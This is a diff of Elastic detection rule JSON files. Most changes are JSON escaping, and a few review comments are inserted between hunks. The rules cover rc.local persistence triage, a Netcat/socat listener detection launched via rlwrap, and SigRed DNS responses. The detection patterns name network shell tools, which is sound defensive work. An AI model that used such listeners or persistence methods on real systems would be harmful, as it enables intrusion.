Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. 
\n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type : \"linux\" and event.category : \"file\" and \nevent.type : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and\nfile.path : \"/etc/rc.local\" and not process.name : (\n \"dockerd\" or \"docker\" or \"dnf\" or \"dnf-automatic\" or \"yum\" or \"rpm\" or \"dpkg\"\n) and not file.extension : (\"swp\" or \"swpx\")\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", 
@@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_1.json b/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_1.json index 5fd9ec3d637..546fa727a0a 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_1.json +++ b/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_1.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Netcat Listener Established via rlwrap", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"rlwrap\" and process.args in (\n \"nc\", \"ncat\", \"netcat\", \"nc.openbsd\", \"socat\"\n) and process.args : \"*l*\" and process.args_count \u003e= 4\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"rlwrap\" and process.args in (\n \"nc\", \"ncat\", \"netcat\", \"nc.openbsd\", \"socat\"\n) and process.args : \"*l*\" and process.args_count >= 4\n", "related_integrations": [ { "package": "endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_2.json b/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_2.json index c98e7ff0700..5525e929fb5 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_2.json +++ b/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_2.json 
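Review bot: The `\u0026` → `&` rewrite in this hunk, and the matching `\u003e`/`\u003c` → `>`/`<` rewrites in the `query` and `setup` strings of the hunks that follow (the rlwrap, Abnormally Large DNS Response and 1160dcdb snapshot files), change only the JSON escaping, not the decoded rule content, so no detection behaviour changes anywhere in this chunk. The churn across frozen `_NNN` snapshot files looks like an exporter default flipping (this is the HTML-safe escaping Go's `encoding/json` emits unless `SetEscapeHTML(false)` is set, if that is the tool in use); pinning that setting in the export step would keep the next release from flipping every file back. It would also be worth having the package validation compare parsed rule objects rather than bytes, so a byte-level diff of this size is not mistaken for a rule update. The enclosing file's header is outside this chunk.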
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Netcat Listener Established via rlwrap", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"rlwrap\" and process.args in (\n \"nc\", \"ncat\", \"netcat\", \"nc.openbsd\", \"socat\"\n) and process.args : \"*l*\" and process.args_count \u003e= 4\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"rlwrap\" and process.args in (\n \"nc\", \"ncat\", \"netcat\", \"nc.openbsd\", \"socat\"\n) and process.args : \"*l*\" and process.args_count >= 4\n", "related_integrations": [ { "package": "endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_103.json b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_103.json index 3ba8c368994..5fae26a439b 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_103.json +++ b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_104.json b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_104.json index ae970f335f4..dfdcddfd69b 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_104.json 
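Review bot: In the new `query` line of this hunk, `process.args : "*l*"` matches any argument that contains the letter l anywhere (a hostname such as `files.internal` or a path like `/usr/local/bin/nc`), so it does not pin the listener option the rule name implies; the `_1` snapshot's matching hunk carries the same query. If the intent is the `-l` style flag of nc/ncat plus socat's `LISTEN` address type, an explicit list such as `process.args : ("-l", "-l?*", "-?*l*", "*LISTEN*")` would keep the listener semantics while excluding ordinary client-side arguments, and `process.args_count >= 4` does not compensate because it only counts tokens. Since these are versioned snapshots, the fix belongs in the rule source rather than in this export.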
@@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_105.json b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_105.json index 68b3f7b8524..7afbac69a14 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_105.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_206.json b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_206.json index c5c987e610a..6b4b4bd97e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_206.json +++ b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_206.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_207.json b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_207.json index b39dbcfcffa..c099738d68d 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_207.json +++ b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_207.json 
@@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_102.json b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_102.json index 429d2e882b8..dc9ac6afe97 100644 --- a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_102.json +++ b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_102.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_103.json b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_103.json index c6c8ea42358..b68fefe5718 100644 --- a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_103.json +++ b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_103.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_104.json b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_104.json index 022d74ade22..2cfd4128452 100644 --- a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_104.json 
@@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_105.json b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_105.json index d32388704b9..bbe24500a22 100644 --- a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_102.json b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_102.json index b87f8c893eb..0dcb87cf968 100644 --- a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_102.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_103.json b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_103.json index 640cfe0b02c..1a48a7b847b 100644 --- a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_103.json 
@@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_104.json b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_104.json index e4cb94733f8..266d69b6867 100644 --- a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_104.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_105.json b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_105.json index 47781b349ee..eb2b600333d 100644 --- a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_105.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_103.json b/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_103.json index 30991c035ad..e95f994cb4c 100644 --- a/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_103.json +++ b/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_103.json 
@@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Abnormally Large DNS Response", "note": "## Triage and analysis\n\n### Investigating Abnormally Large DNS Response\n\nDetection alerts from this rule indicate possible anomalous activity around large byte DNS responses from a Windows DNS server. This detection rule was created based on activity represented in exploitation of vulnerability (CVE-2020-1350) also known as [SigRed](https://www.elastic.co/blog/detection-rules-for-sigred-vulnerability) during July 2020.\n\n#### Possible investigation steps\n\n- This specific rule is sourced from network log activity such as DNS or network level data. It's important to validate the source of the incoming traffic and determine if this activity has been observed previously within an environment.\n- Activity can be further investigated and validated by reviewing any associated Intrusion Detection Signatures (IDS) alerts.\n- Further examination can include a review of the `dns.question_type` network fieldset with a protocol analyzer, such as Zeek, Packetbeat, or Suricata, for `SIG` or `RRSIG` data.\n- Validate the patch level and OS of the targeted DNS server to validate the observed activity was not large-scale internet vulnerability scanning.\n- Validate that the source of the network activity was not from an authorized vulnerability scan or compromise assessment.\n\n#### False positive analysis\n\n- Based on this rule, which looks for a threshold of 60k bytes, it is possible for activity to be generated under 65k bytes and related to legitimate behavior. 
In packet capture files received by the [SANS Internet Storm Center](https://isc.sans.edu/forums/diary/PATCH+NOW+SIGRed+CVE20201350+Microsoft+DNS+Server+Vulnerability/26356/), byte responses were all observed as greater than 65k bytes.\n- This activity can be triggered by compliance/vulnerability scanning or compromise assessment; it's important to determine the source of the activity and potentially allowlist the source host.\n\n### Related rules\n\n- Unusual Child Process of dns.exe - 8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45\n- Unusual File Modification by dns.exe - c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Ensure that you have deployed the latest Microsoft [Security Update](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350) (Monthly Rollup or Security Only) and restarted the patched machines. If unable to patch immediately, Microsoft [released](https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability) a registry-based workaround that doesn\u2019t require a restart. 
This can be used as a temporary solution before the patch is applied.\n- Maintain backups of your critical systems to aid in quick recovery.\n- Perform routine vulnerability scans of your systems, monitor [CISA advisories](https://us-cert.cisa.gov/ncas/current-activity) and patch identified vulnerabilities.\n- If you observe a true positive, implement a remediation plan and monitor host-based artifacts for additional post-exploitation behavior.\n", - "query": "event.category:(network or network_traffic) and destination.port:53 and\n (event.dataset:zeek.dns or type:dns or event.type:connection) and network.bytes \u003e 60000\n", + "query": "event.category:(network or network_traffic) and destination.port:53 and\n (event.dataset:zeek.dns or type:dns or event.type:connection) and network.bytes > 60000\n", "references": [ "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_104.json b/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_104.json index ffa44bfc8b6..7deebbc8768 100644 --- a/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_104.json +++ b/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_104.json 
@@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Abnormally Large DNS Response", "note": "## Triage and analysis\n\n### Investigating Abnormally Large DNS Response\n\nDetection alerts from this rule indicate possible anomalous activity around large byte DNS responses from a Windows DNS server. This detection rule was created based on activity represented in exploitation of vulnerability (CVE-2020-1350) also known as [SigRed](https://www.elastic.co/blog/detection-rules-for-sigred-vulnerability) during July 2020.\n\n#### Possible investigation steps\n\n- This specific rule is sourced from network log activity such as DNS or network level data. It's important to validate the source of the incoming traffic and determine if this activity has been observed previously within an environment.\n- Activity can be further investigated and validated by reviewing any associated Intrusion Detection Signatures (IDS) alerts.\n- Further examination can include a review of the `dns.question_type` network fieldset with a protocol analyzer, such as Zeek, Packetbeat, or Suricata, for `SIG` or `RRSIG` data.\n- Validate the patch level and OS of the targeted DNS server to validate the observed activity was not large-scale internet vulnerability scanning.\n- Validate that the source of the network activity was not from an authorized vulnerability scan or compromise assessment.\n\n#### False positive analysis\n\n- Based on this rule, which looks for a threshold of 60k bytes, it is possible for activity to be generated under 65k bytes and related to legitimate behavior. 
In packet capture files received by the [SANS Internet Storm Center](https://isc.sans.edu/forums/diary/PATCH+NOW+SIGRed+CVE20201350+Microsoft+DNS+Server+Vulnerability/26356/), byte responses were all observed as greater than 65k bytes.\n- This activity can be triggered by compliance/vulnerability scanning or compromise assessment; it's important to determine the source of the activity and potentially allowlist the source host.\n\n### Related rules\n\n- Unusual Child Process of dns.exe - 8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45\n- Unusual File Modification by dns.exe - c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Ensure that you have deployed the latest Microsoft [Security Update](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350) (Monthly Rollup or Security Only) and restarted the patched machines. If unable to patch immediately, Microsoft [released](https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability) a registry-based workaround that doesn\u2019t require a restart. 
This can be used as a temporary solution before the patch is applied.\n- Maintain backups of your critical systems to aid in quick recovery.\n- Perform routine vulnerability scans of your systems, monitor [CISA advisories](https://us-cert.cisa.gov/ncas/current-activity) and patch identified vulnerabilities.\n- If you observe a true positive, implement a remediation plan and monitor host-based artifacts for additional post-exploitation behavior.\n", - "query": "event.dataset: network_traffic.dns and\n (event.dataset:zeek.dns or type:dns or event.type:connection) and network.bytes \u003e 60000\n", + "query": "event.dataset: network_traffic.dns and\n (event.dataset:zeek.dns or type:dns or event.type:connection) and network.bytes > 60000\n", "references": [ "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_105.json b/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_105.json index a4476e5b0cd..ae4a233a4ef 100644 --- a/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_105.json +++ b/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_105.json 
@@ -16,7 +16,7 @@ "license": "Elastic License v2", "name": "Abnormally Large DNS Response", "note": "## Triage and analysis\n\n### Investigating Abnormally Large DNS Response\n\nDetection alerts from this rule indicate possible anomalous activity around large byte DNS responses from a Windows DNS server. This detection rule was created based on activity represented in exploitation of vulnerability (CVE-2020-1350) also known as [SigRed](https://www.elastic.co/blog/detection-rules-for-sigred-vulnerability) during July 2020.\n\n#### Possible investigation steps\n\n- This specific rule is sourced from network log activity such as DNS or network level data. It's important to validate the source of the incoming traffic and determine if this activity has been observed previously within an environment.\n- Activity can be further investigated and validated by reviewing any associated Intrusion Detection Signatures (IDS) alerts.\n- Further examination can include a review of the `dns.question_type` network fieldset with a protocol analyzer, such as Zeek, Packetbeat, or Suricata, for `SIG` or `RRSIG` data.\n- Validate the patch level and OS of the targeted DNS server to validate the observed activity was not large-scale internet vulnerability scanning.\n- Validate that the source of the network activity was not from an authorized vulnerability scan or compromise assessment.\n\n#### False positive analysis\n\n- Based on this rule, which looks for a threshold of 60k bytes, it is possible for activity to be generated under 65k bytes and related to legitimate behavior. 
In packet capture files received by the [SANS Internet Storm Center](https://isc.sans.edu/forums/diary/PATCH+NOW+SIGRed+CVE20201350+Microsoft+DNS+Server+Vulnerability/26356/), byte responses were all observed as greater than 65k bytes.\n- This activity can be triggered by compliance/vulnerability scanning or compromise assessment; it's important to determine the source of the activity and potentially allowlist the source host.\n\n### Related rules\n\n- Unusual Child Process of dns.exe - 8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45\n- Unusual File Modification by dns.exe - c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Ensure that you have deployed the latest Microsoft [Security Update](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350) (Monthly Rollup or Security Only) and restarted the patched machines. If unable to patch immediately, Microsoft [released](https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability) a registry-based workaround that doesn\u2019t require a restart. 
